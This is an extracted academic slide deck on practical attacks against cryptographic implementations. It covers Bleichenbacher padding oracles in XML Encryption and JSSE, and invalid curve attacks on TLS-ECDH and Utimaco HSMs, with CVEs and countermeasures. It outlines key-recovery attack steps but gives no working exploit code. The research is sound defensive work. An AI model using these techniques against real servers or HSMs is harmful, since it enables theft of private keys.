Practical Attacks on Implementations Juraj Somorovsky Ruhr - - PowerPoint PPT Presentation

practical attacks on
SMART_READER_LITE
LIVE PREVIEW

Practical Attacks on Implementations Juraj Somorovsky Ruhr - - PowerPoint PPT Presentation

Jan 14, 2023 114 likes •409 views

Practical Attacks on Implementations Juraj Somorovsky Ruhr University Bochum, HGI 3curity @jurajsomorovsky 1 Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion ons Juraj Somorovsky 1 Recent years

slide-1
SLIDE 1

1

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Practical Attacks on Implementations

Juraj Somorovsky

Ruhr University Bochum, HGI 3curity @jurajsomorovsky 1

slide-2
SLIDE 2

2

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Recent years revealed many crypto attacks…

  • ESORICS 2004, Bard: The Vulnerability of SSL to

Chosen Plaintext Attack

  • Eurocrypt 2002, Vaudenay: Security Flaws Induced by

CBC Padding—Applications to SSL, IPSEC, WTLS

  • Crypto 1998, Bleichenbacher: Chosen Ciphertext

Attacks Against Protocols based on the RSA Encryption Standard PKCS #1

2

slide-3
SLIDE 3

3

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Standards updated

  • Countermeasures defined
  • What could go wrong in RWC

implementations?

3

slide-4
SLIDE 4

4

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky
  • 1. Bleichenbacher’s Attack
  • XML Encryption
  • TLS
  • 2. Invalid Curve Attack
  • TLS
  • Hardware Security Modules

Overview

slide-5
SLIDE 5

5

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

RSA-PKCS#1 v1.5

  • Used to encrypt symmetric keys
  • Vulnerable to an adaptive chosen-ciphertext

attack

5

Client XML Encryption ciphertext C = Enc(M) C1 valid/invalid M = Dec(C) Server C2 valid/invalid Ciphertext C = Enc(M) … (repeated several times)

slide-6
SLIDE 6

6

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

RSA-PKCS#1 v1.5: Countermeasures

  • 1. Use RSA-OAEP (PKCS#1 v2)
  • 2. Apply specific countermeasure

6

generate random decrypt ciphertext: m = dec(c) if ( padding correct ) proceed with m else proceed with random

slide-7
SLIDE 7

7

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky
  • 1. Bleichenbacher’s Attack
  • XML Encryption
  • TLS
  • 2. Invalid Curve Attack
  • TLS
  • Hardware Security Modules

Overview

slide-8
SLIDE 8

9

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

RSA PKCS#1 v1.5 in XML Encryption

  • Hybrid encryption:

9

1 2 k

k = Dec_pkcs(priv,C1) m = Dec_aes128(k,C2) Dec_pkcs Dec_aes128

slide-9
SLIDE 9

10

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Attack Countermeasure

  • Hybrid encryption:

10

1 2 k

k = Dec_pkcs(priv,C1) m = Dec_aes128(k,C2) Dec_pkcs Dec_aes128

Random: 128 b

slide-10
SLIDE 10

11

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Case Apache WSS4J

  • Hybrid encryption:

11

1 2 k

k = Dec_pkcs(priv,C1) m = Dec_aes128(k,C2) Dec_pkcs Dec_aes128

Random: 128 B

slide-11
SLIDE 11

12

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Case Apache WSS4J

  • Hybrid encryption:

12

1 2 k

k = Dec_pkcs(priv,C1) m = Dec_aes128(k,C2) Dec_pkcs Dec_aes128

Random: 128 B

slide-12
SLIDE 12

17

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Case Apache WSS4J

  • Original bug much more complicated
  • CVE-2015-0226
  • Dennis Kupser, Christian Mainka, Jörg

Schwenk, Juraj Somorovsky: How to Break XML Encryption – Automatically (WOOT‘15)

  • Found automatically using WS-Attacker
  • https://github.com/RUB-NDS/WS-Attacker

17

slide-13
SLIDE 13

18

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky
  • 1. Bleichenbacher’s Attack
  • XML Encryption
  • TLS
  • 2. Invalid Curve Attack
  • TLS
  • Hardware Security Modules

Overview

slide-14
SLIDE 14

19

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

How About TLS?

  • Christopher Meyer, Juraj Somorovsky, Jörg

Schwenk, Eugen Weiss, Sebastian Schinzel, Erik Tews: Revisiting SSL/TLS Implementations: New Bleichenbacher Side Channels and Attacks. USENIX Security 2014

  • Practical attacks on JSSE, Bouncy Castle,

Cavium Accelerator

  • Bug in OpenSSL

19

slide-15
SLIDE 15

20

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Case JSSE

  • No direct TLS error messages
  • Uses PKCS#1 unpadding function:
  • Caught, random generated…what’s wrong?

20

private byte [] unpadV15 (byte[] padded) { if (PKCS valid) { return unpadded text; } else { throw new BadPaddingException(); } }

slide-16
SLIDE 16

21

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Case JSSE (CVE-2014-411)

  • Exception consumes about 20 microseconds!

21

PKCS#1 valid, no exception PKCS#1 invalid, exception

Bleichenbacher’s Attack over LAN!

slide-17
SLIDE 17

22

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky
  • 1. Bleichenbacher’s Attack
  • XML Encryption
  • TLS
  • 2. Invalid Curve Attack
  • TLS
  • Hardware Security Modules

Overview

slide-18
SLIDE 18

23

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Elliptic Curve

  • Set of points over a finite field
  • Used e.g. for key exchange

23

Client Server

P Secret s Key: sP P

slide-19
SLIDE 19

24

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky
  • Crypto 2000: Biehl, Meyer, Müller
  • Attacker sends an invalid point of small order (e.g. 5)
  • Attacker computes:

Invalid Curve Attack

24

Server

Q Secret s Q

𝒕𝟐 = 𝒕 𝒏𝒑𝒆 𝟔

slide-20
SLIDE 20

25

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Invalid Curve Attack

  • Choose points of small co-prime order (5, 7, 11, …)
  • Send to the server
  • Compute:

𝑡1 = 𝑡 𝑛𝑝𝑒 5 𝑡2 = 𝑡 𝑛𝑝𝑒 7 𝑡3 = 𝑡 𝑛𝑝𝑒 11 𝑡4 = 𝑡 𝑛𝑝𝑒 13

  • Compute s with CRT

25

slide-21
SLIDE 21

26

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky
  • 1. Bleichenbacher’s Attack
  • XML Encryption
  • TLS
  • 2. Invalid Curve Attack
  • TLS
  • Hardware Security Modules

Overview

slide-22
SLIDE 22

27

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Practical Attacks?

  • Tibor Jager, Jörg Schwenk, Juraj Somorovsky:

Practical Invalid Curve Attacks on TLS-ECDH. ESORICS 2015

  • Analyzed 8 libraries
  • 2 vulnerable

– Bouncy Castle: 3300 TLS queries – Oracle JSSE: 17000 TLS queries

27

slide-23
SLIDE 23

28

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Impact

  • Attacks extract server private keys
  • Java servers using EC certificates vulnerable

– For example Apache Tomcat

28

Demo

slide-24
SLIDE 24

29

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky
  • 1. Bleichenbacher’s Attack
  • XML Encryption
  • TLS
  • 2. Invalid Curve Attack
  • TLS
  • Hardware Security Modules

Overview

slide-25
SLIDE 25

30

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Attacker Model in HSM Scenarios

  • Storage of crypto keys
  • Keys never leave HSMs

30

dec (C) m

Keys (RSA, EC, AES …)

slide-26
SLIDE 26

31

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Attacker Model in HSM Scenarios

  • Storage of crypto keys
  • Keys never leave HSMs

31

getKey

Keys (RSA, EC, AES …)

slide-27
SLIDE 27

32

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

How about Invalid Curve Attacks?

  • CVE-2015-6924 (with Dennis Felsch)
  • Utimaco HSMs vulnerable
  • < 100 queries to get a key…Heartbleed effect
  • Thanks to cooperation of Utimaco

– Provided sample code, fast fix

  • Utimaco HSM is FIPS certified

32 "Catastrophic" is the right word. On the scale

  • f 1 to 10, this is an 11.
slide-28
SLIDE 28

33

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Conclusions

  • Old attacks relevant for RWC implementations
  • Old algorithms in the newest standards

– RSA PKCS#1 v1.5 (attack: 1998)

2008: TLS 1.2 2013: XML Encryption 1.1 2015: JSON Web Encryption

– Positive example: TLS 1.3

33

slide-29
SLIDE 29

34

Practi tical l Attacks on Real l World ld Crypto to Imple lementa mentati tion

  • ns Juraj Somorovsky

Conclusions

  • For standard designers:

– Remove old crypto

  • For developers:

– Analyze possible side-channels, best practices

  • Check point is on curve
  • For pentesters:

– More tools / analyses of crypto applications needed

34